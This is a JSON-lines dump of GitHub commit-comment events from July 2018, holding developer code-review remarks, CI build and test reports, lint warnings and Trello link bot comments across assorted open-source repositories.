{"id":"8013223172","type":"CommitCommentEvent","actor":{"login":"dimtish"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29821235,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T23:01:43Z","updated_at":"2018-07-24T23:01:43Z","author_association":"NONE","body":"Good project"}},"created_at":"2018-07-24T23:01:43Z"}
{"id":"8013227087","type":"CommitCommentEvent","actor":{"login":"jkjh0819"},"repo":{"name":"ratchetcloud/forums-frontend"},"payload":{"comment":{"id":29821240,"position":23,"line":85,"path":"src/client.js","commit_id":"cd6af73aa39530a1b4c7b8fef867ec28dd0478e9","created_at":"2018-07-24T23:02:51Z","updated_at":"2018-07-24T23:02:51Z","author_association":"COLLABORATOR","body":"Why you change patch to put?"}},"created_at":"2018-07-24T23:02:51Z"}
{"id":"8013232459","type":"CommitCommentEvent","actor":{"login":"Stanzilla"},"repo":{"name":"InfusOnWoW/WeakAuras2"},"payload":{"comment":{"id":29821249,"position":20,"line":594,"path":"WeakAuras/WeakAuras.lua","commit_id":"08610576fca653db1dce457847e0c82d3226b278","created_at":"2018-07-24T23:04:35Z","updated_at":"2018-07-24T23:04:35Z","author_association":"NONE","body":"typo"}},"created_at":"2018-07-24T23:04:35Z"}
{"id":"8013242471","type":"CommitCommentEvent","actor":{"login":"pouchak"},"repo":{"name":"pouchak/rainbows-end-api"},"payload":{"comment":{"id":29821275,"position":null,"line":null,"path":null,"commit_id":"e58f610996c2ea54fc58e66564ce62d481e49b9a","created_at":"2018-07-24T23:07:40Z","updated_at":"2018-07-24T23:07:40Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Commit API to Github](https://trello.com/c/HqYpLUz2/1-commit-api-to-github)"}},"created_at":"2018-07-24T23:07:40Z"}
{"id":"8013245133","type":"CommitCommentEvent","actor":{"login":"Mottie"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29821283,"position":null,"line":null,"path":null,"commit_id":"36fa554d6db302b15f0c1b533dfe67a3a8ef885a","created_at":"2018-07-24T23:08:36Z","updated_at":"2018-07-24T23:08:36Z","author_association":"MEMBER","body":"🤞 "}},"created_at":"2018-07-24T23:08:36Z"}
{"id":"8013246493","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29821290,"position":null,"line":null,"path":null,"commit_id":"be084e58412bdf2bdbf80b9782ac4314efac7358","created_at":"2018-07-24T23:09:04Z","updated_at":"2018-07-24T23:09:04Z","author_association":"NONE","body":"kiva-longwave (nealkruis) - x86_64-MacOS-10.9-clang: Tests Failed (1398 of 2956 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 624\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be084e58412bdf2bdbf80b9782ac4314efac7358-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be084e58412bdf2bdbf80b9782ac4314efac7358-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-47.29%25-red.png)</a> \n"}},"created_at":"2018-07-24T23:09:04Z"}
{"id":"8013250789","type":"CommitCommentEvent","actor":{"login":"bayucan"},"repo":{"name":"PBSPro/pbspro"},"payload":{"comment":{"id":29821305,"position":null,"line":null,"path":null,"commit_id":"63e8021174a18322578c3cbe85de99fce6d9095d","created_at":"2018-07-24T23:10:26Z","updated_at":"2018-07-24T23:10:26Z","author_association":"CONTRIBUTOR","body":"Looks good. I sign off."}},"created_at":"2018-07-24T23:10:26Z"}
{"id":"8013251471","type":"CommitCommentEvent","actor":{"login":"christianbundy"},"repo":{"name":"nihilowy/surfer"},"payload":{"comment":{"id":29821307,"position":null,"line":null,"path":null,"commit_id":"b64a65c3ec31cafc219c90d23a51e8090252e9c5","created_at":"2018-07-24T23:10:39Z","updated_at":"2018-07-24T23:10:39Z","author_association":"NONE","body":":+1: "}},"created_at":"2018-07-24T23:10:39Z"}
{"id":"8013253817","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29821317,"position":null,"line":null,"path":null,"commit_id":"a5854b3e2193dea8784c7c6e6445f6c59e2a5703","created_at":"2018-07-24T23:11:24Z","updated_at":"2018-07-24T23:11:24Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-925](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-925).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-925-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-24T23:11:24Z"}
{"id":"8013254882","type":"CommitCommentEvent","actor":{"login":"RandyCalderon"},"repo":{"name":"RandyCalderon/Node-Express-Lab"},"payload":{"comment":{"id":29821319,"position":null,"line":null,"path":null,"commit_id":"478dd9d8b77ef7884a13998fe27473660f12bb8a","created_at":"2018-07-24T23:11:44Z","updated_at":"2018-07-24T23:11:44Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [When the client makes a DELETE request to /api/posts/:id:](https://trello.com/c/N9funrGl/3-when-the-client-makes-a-delete-request-to-api-posts-id)"}},"created_at":"2018-07-24T23:11:44Z"}
{"id":"8013256256","type":"CommitCommentEvent","actor":{"login":"Prev"},"repo":{"name":"ratchetcloud/forums-frontend"},"payload":{"comment":{"id":29821325,"position":23,"line":85,"path":"src/client.js","commit_id":"cd6af73aa39530a1b4c7b8fef867ec28dd0478e9","created_at":"2018-07-24T23:12:10Z","updated_at":"2018-07-24T23:12:10Z","author_association":"COLLABORATOR","body":"Ok. `PATCH` would be better. I'll change it with backend"}},"created_at":"2018-07-24T23:12:10Z"}
{"id":"8013263467","type":"CommitCommentEvent","actor":{"login":"onsi"},"repo":{"name":"onsi/gomega"},"payload":{"comment":{"id":29821367,"position":null,"line":null,"path":null,"commit_id":"4bb581de2267ae3b1171b4c084ab7055fb5530fb","created_at":"2018-07-24T23:14:34Z","updated_at":"2018-07-24T23:14:34Z","author_association":"OWNER","body":"um.. why?"}},"created_at":"2018-07-24T23:14:34Z"}
{"id":"8013263601","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29821368,"position":null,"line":null,"path":null,"commit_id":"2bf813d6a0bb72fc7866dc65eb435bc814063095","created_at":"2018-07-24T23:14:37Z","updated_at":"2018-07-24T23:14:37Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-534](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-534).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-534-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-24T23:14:37Z"}
{"id":"8013265086","type":"CommitCommentEvent","actor":{"login":"ebuchman"},"repo":{"name":"tendermint/tendermint"},"payload":{"comment":{"id":29821371,"position":null,"line":null,"path":null,"commit_id":"2e75214316be713f9d18c9963df25fabbfcfa147","created_at":"2018-07-24T23:15:05Z","updated_at":"2018-07-24T23:15:05Z","author_association":"CONTRIBUTOR","body":"We shouldn't update dependencies like this unless we have documented reasoning."}},"created_at":"2018-07-24T23:15:05Z"}
{"id":"8013268712","type":"CommitCommentEvent","actor":{"login":"alkis"},"repo":{"name":"romkatv/hcproxy"},"payload":{"comment":{"id":29821386,"position":108,"line":108,"path":"event_loop.cc","commit_id":"0c52f01ff136f1897bdf0bfb691b4a6696759810","created_at":"2018-07-24T23:16:17Z","updated_at":"2018-07-24T23:16:17Z","author_association":"NONE","body":"If `Refresh()` can optionally take `now` you can pass this `Clock::now()` to it here. Likely it won't matter because this is not a hot path."}},"created_at":"2018-07-24T23:16:17Z"}
{"id":"8013270640","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29821391,"position":null,"line":null,"path":null,"commit_id":"21936948bbb07105db3981441b7726a75ee4cdf5","created_at":"2018-07-24T23:16:54Z","updated_at":"2018-07-24T23:16:54Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/master/28/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/master/28//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/master/21936948bbb07105db3981441b7726a75ee4cdf5/28/jenkins-results/api-diff/index.html)\nℹ️ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/master/21936948bbb07105db3981441b7726a75ee4cdf5/28/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/master/21936948bbb07105db3981441b7726a75ee4cdf5/28/jenkins-results/generator-diff/index.html) (only version changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/master/21936948bbb07105db3981441b7726a75ee4cdf5/28/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-24T23:16:54Z"}
{"id":"8013271861","type":"CommitCommentEvent","actor":{"login":"PreyMa"},"repo":{"name":"Corprey/Diplomarbeit"},"payload":{"comment":{"id":29821394,"position":null,"line":null,"path":null,"commit_id":"73050544f76613ab1cc8bc2b8cafd2b88d29ad6f","created_at":"2018-07-24T23:17:18Z","updated_at":"2018-07-24T23:17:18Z","author_association":"COLLABORATOR","body":"This commit has a wrong commit message\r\nIt should be: 'Added color picker dependencies'\r\n+ Spectrum color picker library source code\r\n+ Icons"}},"created_at":"2018-07-24T23:17:18Z"}
{"id":"8013274590","type":"CommitCommentEvent","actor":{"login":"justinbmeyer"},"repo":{"name":"canjs/can-route"},"payload":{"comment":{"id":29821408,"position":null,"line":null,"path":null,"commit_id":"b78b2e6a1c1375c08cfb55ee0541aa79c9fea493","created_at":"2018-07-24T23:18:12Z","updated_at":"2018-07-24T23:18:12Z","author_association":"CONTRIBUTOR","body":"I thought I fixed this. I know the solution. Ping me tomorrow so we can fix it. "}},"created_at":"2018-07-24T23:18:12Z"}
{"id":"8013275785","type":"CommitCommentEvent","actor":{"login":"BecauseYaMogu"},"repo":{"name":"iride2020/"},"payload":{"comment":{"id":29821412,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T23:18:34Z","updated_at":"2018-07-24T23:18:34Z","author_association":"NONE","body":"nice project\r\n"}},"created_at":"2018-07-24T23:18:34Z"}
{"id":"8013275785","type":"CommitCommentEvent","actor":{"login":"BecauseYaMogu"},"repo":{"name":"iride2020/"},"payload":{"comment":{"id":29821412,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T23:18:34Z","updated_at":"2018-07-24T23:18:34Z","author_association":"NONE","body":"nice project\r\n"}},"created_at":"2018-07-24T23:18:34Z"}
{"id":"8013276218","type":"CommitCommentEvent","actor":{"login":"OrionNebula"},"repo":{"name":"Ceilidh-Team/ffmpeg-audio-decode"},"payload":{"comment":{"id":29821415,"position":null,"line":null,"path":null,"commit_id":"9465a5f9e92f95016eb2669ac28f70fffd82c2e9","created_at":"2018-07-24T23:18:43Z","updated_at":"2018-07-24T23:18:43Z","author_association":"MEMBER","body":"bors r+"}},"created_at":"2018-07-24T23:18:43Z"}
{"id":"8013282747","type":"CommitCommentEvent","actor":{"login":"laveesingh"},"repo":{"name":"Abhina-s/Trip_guru_assesment"},"payload":{"comment":{"id":29821429,"position":10,"line":10,"path":"webapp/src/reducers/imageList.js","commit_id":"da0ce5515cf7319d9debfbed0c179ffde6fcdd46","created_at":"2018-07-24T23:20:50Z","updated_at":"2018-07-24T23:20:50Z","author_association":"NONE","body":"How about spread operator here?"}},"created_at":"2018-07-24T23:20:50Z"}
{"id":"8013308288","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29821494,"position":null,"line":null,"path":null,"commit_id":"eabd4d59642a647988802228e7d48fbbeb5cdb29","created_at":"2018-07-24T23:29:21Z","updated_at":"2018-07-24T23:29:21Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2323 of 2324 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 627\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eabd4d59642a647988802228e7d48fbbeb5cdb29-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eabd4d59642a647988802228e7d48fbbeb5cdb29-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eabd4d59642a647988802228e7d48fbbeb5cdb29-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-24T23:29:21Z"}
{"id":"8013308551","type":"CommitCommentEvent","actor":{"login":"jzheaux"},"repo":{"name":"jzheaux/spring-security"},"payload":{"comment":{"id":29821495,"position":94,"line":94,"path":"oauth2/oauth2-resource-server/src/main/java/org/springframework/security/oauth2/server/resource/authentication/JwtTimestampsValidator.java","commit_id":"95e2877ad54cacbf40ae9501a36048d7a3cbc24a","created_at":"2018-07-24T23:29:27Z","updated_at":"2018-07-24T23:29:27Z","author_association":"OWNER","body":"This is the result of community feedback. Will link the ticket."}},"created_at":"2018-07-24T23:29:27Z"}
{"id":"8013308949","type":"CommitCommentEvent","actor":{"login":"Xorboo"},"repo":{"name":"getnamo/ZipUtility-ue4"},"payload":{"comment":{"id":29821497,"position":null,"line":null,"path":null,"commit_id":"5d9e30e028d80c2bb702e5611dd0bf8c3d04ab92","created_at":"2018-07-24T23:29:35Z","updated_at":"2018-07-24T23:29:35Z","author_association":"NONE","body":"Done. Tried using registry to find VS installation path, seems to be working for Community version at least, not sure how will it behave is multiple versions are installed. In the worst case there is a fallback to the most common installation path."}},"created_at":"2018-07-24T23:29:35Z"}
{"id":"8013312109","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29821507,"position":null,"line":null,"path":null,"commit_id":"5abe71ef175308ce234f4c5da1871bc589c81170","created_at":"2018-07-24T23:30:33Z","updated_at":"2018-07-24T23:30:33Z","author_association":"COLLABORATOR","body":"<h3>[Core] Rerender popovers when content resizes (#2718)</h3>\n\nPreview: <strong><a href='https://19132-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://19132-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://19132-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-24T23:30:33Z"}
{"id":"8013312477","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29821510,"position":null,"line":null,"path":null,"commit_id":"eabd4d59642a647988802228e7d48fbbeb5cdb29","created_at":"2018-07-24T23:30:40Z","updated_at":"2018-07-24T23:30:40Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eabd4d59642a647988802228e7d48fbbeb5cdb29-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-24T23:30:40Z"}
{"id":"8013320549","type":"CommitCommentEvent","actor":{"login":"nex3"},"repo":{"name":"sass/dart-sass"},"payload":{"comment":{"id":29821529,"position":5,"line":262,"path":"lib/src/node.dart","commit_id":"e1750216eee7f4a63597d9a326f3dee512933c12","created_at":"2018-07-24T23:33:20Z","updated_at":"2018-07-24T23:33:20Z","author_association":"CONTRIBUTOR","body":"Good point. Changed."}},"created_at":"2018-07-24T23:33:20Z"}
{"id":"8013328413","type":"CommitCommentEvent","actor":{"login":"BalusC"},"repo":{"name":"omnifaces/omnifaces"},"payload":{"comment":{"id":29821548,"position":13,"line":66,"path":"src/main/java/org/omnifaces/taghandler/TagAttribute.java","commit_id":"488000c53d3f4eeb6d96f1ea1d237904d4869fd2","created_at":"2018-07-24T23:36:00Z","updated_at":"2018-07-24T23:36:00Z","author_association":"MEMBER","body":"Roger"}},"created_at":"2018-07-24T23:36:00Z"}
{"id":"8013338504","type":"CommitCommentEvent","actor":{"login":"BevryMe"},"repo":{"name":"bevry/envfile"},"payload":{"comment":{"id":29821564,"position":null,"line":null,"path":null,"commit_id":"a1bc944229d5ca45877f30c08529f1241d645ede","created_at":"2018-07-24T23:39:32Z","updated_at":"2018-07-24T23:39:32Z","author_association":"MEMBER","body":"This commit has been mentioned on **Bevry's Discourse**. There might be relevant details there:\n\nhttps://discuss.bevry.me/t/how-the-node-module-envfile-handles-comments/121/4\n"}},"created_at":"2018-07-24T23:39:32Z"}
{"id":"8013342749","type":"CommitCommentEvent","actor":{"login":"pouchak"},"repo":{"name":"pouchak/rainbows-end-api"},"payload":{"comment":{"id":29821572,"position":null,"line":null,"path":null,"commit_id":"2efc3e1ae2517b135d6cd235966a60ce1d6ef528","created_at":"2018-07-24T23:40:59Z","updated_at":"2018-07-24T23:40:59Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Separate folder for Controller methods](https://trello.com/c/js3PUXok/6-separate-folder-for-controller-methods)"}},"created_at":"2018-07-24T23:40:59Z"}
{"id":"8013344959","type":"CommitCommentEvent","actor":{"login":"jzheaux"},"repo":{"name":"jzheaux/spring-security"},"payload":{"comment":{"id":29821575,"position":45,"line":45,"path":"oauth2/oauth2-core/src/main/java/org/springframework/security/oauth2/core/validator/DelegatingOAuth2TokenValidator.java","commit_id":"95e2877ad54cacbf40ae9501a36048d7a3cbc24a","created_at":"2018-07-24T23:41:45Z","updated_at":"2018-07-24T23:41:45Z","author_association":"OWNER","body":"A simpler way to do this, for the time being, would be to return the very first result failure so that we don't have to worry about concatenating error messages, etc."}},"created_at":"2018-07-24T23:41:45Z"}
{"id":"8013345166","type":"CommitCommentEvent","actor":{"login":"kocokprotol"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29821576,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T23:41:49Z","updated_at":"2018-07-24T23:41:49Z","author_association":"NONE","body":"Nice"}},"created_at":"2018-07-24T23:41:49Z"}
{"id":"8013345897","type":"CommitCommentEvent","actor":{"login":"pfernie"},"repo":{"name":"bradfier/tibrv-rs"},"payload":{"comment":{"id":29821577,"position":null,"line":null,"path":null,"commit_id":"d64c803406da76fe4d0608c566e422492b6c306c","created_at":"2018-07-24T23:42:04Z","updated_at":"2018-07-24T23:42:04Z","author_association":"CONTRIBUTOR","body":"API seems reasonable and straightforward. I haven't done a lot with `tokio`/`futures`, but even so the API is understandable, so :+1: in my book.\r\n\r\nMinor thoughts:\r\n* An `Inbox(String)` newtype wrapper? I don't see many (any) spots where this type enforcement is much of a win, so probably overkill...\r\n\r\n* It may be nice to allow the handling of \"unexpected non-request-reply\" message in `serve`, but this would probably be better exposed via an additional method rather than cluttering the existing `serve` fn. e.g.\r\n```rust\r\n    pub fn serve_request_or<F>(&self, subject: &str, onRequestMsg: F, onPlainMsg: P) -> Result<(), TibrvError>\r\n    where\r\n        F: Fn(Msg) -> Result<Msg, TibrvError>,\r\n        P: Fn(Msg) -> Result<(), TibrvError>,\r\n    {\r\n        let sub = self.subscribe(subject)?;\r\n        loop {\r\n            let incoming = sub.next()?;\r\n            let reply_subj = incoming.get_reply_subject()?;\r\n\r\n            if let Some(reply_subj) = reply_subj {\r\n                let mut reply = onRequestMsg(incoming)?;\r\n                reply.set_send_subject(&reply_subj)?;\r\n                self.send(&mut reply)?\r\n            } else {\r\n                onPlainMsg(incoming)?\r\n            }\r\n        }\r\n}\r\n```\r\n\r\nMinor code review items:\r\nhttps://github.com/bradfier/tibrv-rs/blob/d64c803406da76fe4d0608c566e422492b6c306c/src/context.rs#L262-L266\r\nMight be more idiomatic as:\r\n```rust\r\n if let Some(subj) = reply_subj { \r\n     let mut reply = f(incoming)?; \r\n     reply.set_send_subject(&subj)?; \r\n     self.send(&mut reply)? \r\n} \r\n```\r\n\r\nThis unsafe:\r\nhttps://github.com/bradfier/tibrv-rs/blob/d64c803406da76fe4d0608c566e422492b6c306c/src/context.rs#L196-L204\r\n\r\nCould be made narrower and avoid the buried `expect` (not sure if this is idiomatic `failure`/`Context` usage):\r\n```rust\r\n        unsafe {\r\n            tibrvTransport_CreateInbox(self.inner, buf.as_mut_ptr(), 128).and_then(|_| {\r\n                CString::from_vec_unchecked(buf.into_iter().map(|c| c as u8).collect())\r\n                    .into_string()\r\n                    .map_err(|_| Context::new(\"CreateInbox\".to_string()))\r\n                    .context(ErrorKind::StrContentError)\r\n                    .map_err(TibrvError::from)\r\n            })\r\n        }.map(|s| s.trim_right_matches('\\0').to_owned())\r\n```"}},"created_at":"2018-07-24T23:42:04Z"}
{"id":"8013346968","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"hbc/bcbioBase"},"payload":{"comment":{"id":29821580,"position":null,"line":null,"path":null,"commit_id":"b948c9533bf887c0b99a28f4ec1ed1e31131e35b","created_at":"2018-07-24T23:42:25Z","updated_at":"2018-07-24T23:42:25Z","author_association":"NONE","body":"[tests/testthat/test_plot_heatmap_functions.R:43:52:](https://github.com/hbc/bcbioBase/blob/b948c9533bf887c0b99a28f4ec1ed1e31131e35b/tests/testthat/test_plot_heatmap_functions.R#L43) *style:* **Integers should not be implicit. Use the form 1L for integers or 1.0 for doubles.**\n```r\n​        color <- colorRampPalette(brewer.pal(n = 11, name = \"PuOr\"))(256)\n                                                 ~~^\n```\n[tests/testthat/test_plot_heatmap_functions.R:43:73:](https://github.com/hbc/bcbioBase/blob/b948c9533bf887c0b99a28f4ec1ed1e31131e35b/tests/testthat/test_plot_heatmap_functions.R#L43) *style:* **Integers should not be implicit. Use the form 1L for integers or 1.0 for doubles.**\n```r\n​        color <- colorRampPalette(brewer.pal(n = 11, name = \"PuOr\"))(256)\n                                                                     ~~~^\n```"}},"created_at":"2018-07-24T23:42:25Z"}
{"id":"8013347161","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"hbc/bcbioBase"},"payload":{"comment":{"id":29821581,"position":null,"line":null,"path":null,"commit_id":"b948c9533bf887c0b99a28f4ec1ed1e31131e35b","created_at":"2018-07-24T23:42:30Z","updated_at":"2018-07-24T23:42:30Z","author_association":"NONE","body":"[tests/testthat/test_plot_heatmap_functions.R:43:52:](https://github.com/hbc/bcbioBase/blob/b948c9533bf887c0b99a28f4ec1ed1e31131e35b/tests/testthat/test_plot_heatmap_functions.R#L43) *style:* **Integers should not be implicit. Use the form 1L for integers or 1.0 for doubles.**\n```r\n​        color <- colorRampPalette(brewer.pal(n = 11, name = \"PuOr\"))(256)\n                                                 ~~^\n```\n[tests/testthat/test_plot_heatmap_functions.R:43:73:](https://github.com/hbc/bcbioBase/blob/b948c9533bf887c0b99a28f4ec1ed1e31131e35b/tests/testthat/test_plot_heatmap_functions.R#L43) *style:* **Integers should not be implicit. Use the form 1L for integers or 1.0 for doubles.**\n```r\n​        color <- colorRampPalette(brewer.pal(n = 11, name = \"PuOr\"))(256)\n                                                                     ~~~^\n```"}},"created_at":"2018-07-24T23:42:30Z"}
{"id":"8013347350","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"hbc/bcbioBase"},"payload":{"comment":{"id":29821583,"position":null,"line":null,"path":null,"commit_id":"b948c9533bf887c0b99a28f4ec1ed1e31131e35b","created_at":"2018-07-24T23:42:34Z","updated_at":"2018-07-24T23:42:34Z","author_association":"NONE","body":"[tests/testthat/test_plot_heatmap_functions.R:43:52:](https://github.com/hbc/bcbioBase/blob/b948c9533bf887c0b99a28f4ec1ed1e31131e35b/tests/testthat/test_plot_heatmap_functions.R#L43) *style:* **Integers should not be implicit. Use the form 1L for integers or 1.0 for doubles.**\n```r\n​        color <- colorRampPalette(brewer.pal(n = 11, name = \"PuOr\"))(256)\n                                                 ~~^\n```\n[tests/testthat/test_plot_heatmap_functions.R:43:73:](https://github.com/hbc/bcbioBase/blob/b948c9533bf887c0b99a28f4ec1ed1e31131e35b/tests/testthat/test_plot_heatmap_functions.R#L43) *style:* **Integers should not be implicit. Use the form 1L for integers or 1.0 for doubles.**\n```r\n​        color <- colorRampPalette(brewer.pal(n = 11, name = \"PuOr\"))(256)\n                                                                     ~~~^\n```"}},"created_at":"2018-07-24T23:42:34Z"}
{"id":"8013348187","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"hbc/bcbioBase"},"payload":{"comment":{"id":29821586,"position":null,"line":null,"path":null,"commit_id":"b948c9533bf887c0b99a28f4ec1ed1e31131e35b","created_at":"2018-07-24T23:42:51Z","updated_at":"2018-07-24T23:42:51Z","author_association":"NONE","body":"[tests/testthat/test_plot_heatmap_functions.R:43:52:](https://github.com/hbc/bcbioBase/blob/b948c9533bf887c0b99a28f4ec1ed1e31131e35b/tests/testthat/test_plot_heatmap_functions.R#L43) *style:* **Integers should not be implicit. Use the form 1L for integers or 1.0 for doubles.**\n```r\n​        color <- colorRampPalette(brewer.pal(n = 11, name = \"PuOr\"))(256)\n                                                 ~~^\n```\n[tests/testthat/test_plot_heatmap_functions.R:43:73:](https://github.com/hbc/bcbioBase/blob/b948c9533bf887c0b99a28f4ec1ed1e31131e35b/tests/testthat/test_plot_heatmap_functions.R#L43) *style:* **Integers should not be implicit. Use the form 1L for integers or 1.0 for doubles.**\n```r\n​        color <- colorRampPalette(brewer.pal(n = 11, name = \"PuOr\"))(256)\n                                                                     ~~~^\n```"}},"created_at":"2018-07-24T23:42:51Z"}
{"id":"8013352007","type":"CommitCommentEvent","actor":{"login":"jzheaux"},"repo":{"name":"jzheaux/spring-security"},"payload":{"comment":{"id":29821593,"position":9,"line":9,"path":"oauth2/oauth2-core/src/main/java/org/springframework/security/oauth2/core/validator/SingleOAuth2TokenValidatorResult.java","commit_id":"95e2877ad54cacbf40ae9501a36048d7a3cbc24a","created_at":"2018-07-24T23:44:12Z","updated_at":"2018-07-24T23:44:12Z","author_association":"OWNER","body":"My perspective here is that this replaces an exception. Originally, the validator contract threw an exception in order to transmit the error message."}},"created_at":"2018-07-24T23:44:12Z"}
{"id":"8013353836","type":"CommitCommentEvent","actor":{"login":"jzheaux"},"repo":{"name":"jzheaux/spring-security"},"payload":{"comment":{"id":29821599,"position":6,"line":6,"path":"oauth2/oauth2-core/src/main/java/org/springframework/security/oauth2/core/validator/SingleOAuth2TokenValidatorResult.java","commit_id":"95e2877ad54cacbf40ae9501a36048d7a3cbc24a","created_at":"2018-07-24T23:44:49Z","updated_at":"2018-07-24T23:44:49Z","author_association":"OWNER","body":"If we say that we don't care about a message when the validation is successful, then we could get rid of this. isSuccess would simply compare itself to a static final instance instead."}},"created_at":"2018-07-24T23:44:49Z"}
{"id":"8013354564","type":"CommitCommentEvent","actor":{"login":"mfort87"},"repo":{"name":"BCTeam2018/Project1"},"payload":{"comment":{"id":29821605,"position":null,"line":null,"path":null,"commit_id":"18f0e59b275f0142349b33c3b87103f417c7d61c","created_at":"2018-07-24T23:45:05Z","updated_at":"2018-07-24T23:45:05Z","author_association":"COLLABORATOR","body":"let's just merge it"}},"created_at":"2018-07-24T23:45:05Z"}
{"id":"8013355460","type":"CommitCommentEvent","actor":{"login":"pouchak"},"repo":{"name":"pouchak/rainbows-end-api"},"payload":{"comment":{"id":29821609,"position":null,"line":null,"path":null,"commit_id":"f2316d66d561f263de61da31e9a9330d1cab341a","created_at":"2018-07-24T23:45:23Z","updated_at":"2018-07-24T23:45:23Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Delete outdated npm dependencies](https://trello.com/c/XT6OAwni/20-delete-outdated-npm-dependencies)"}},"created_at":"2018-07-24T23:45:23Z"}
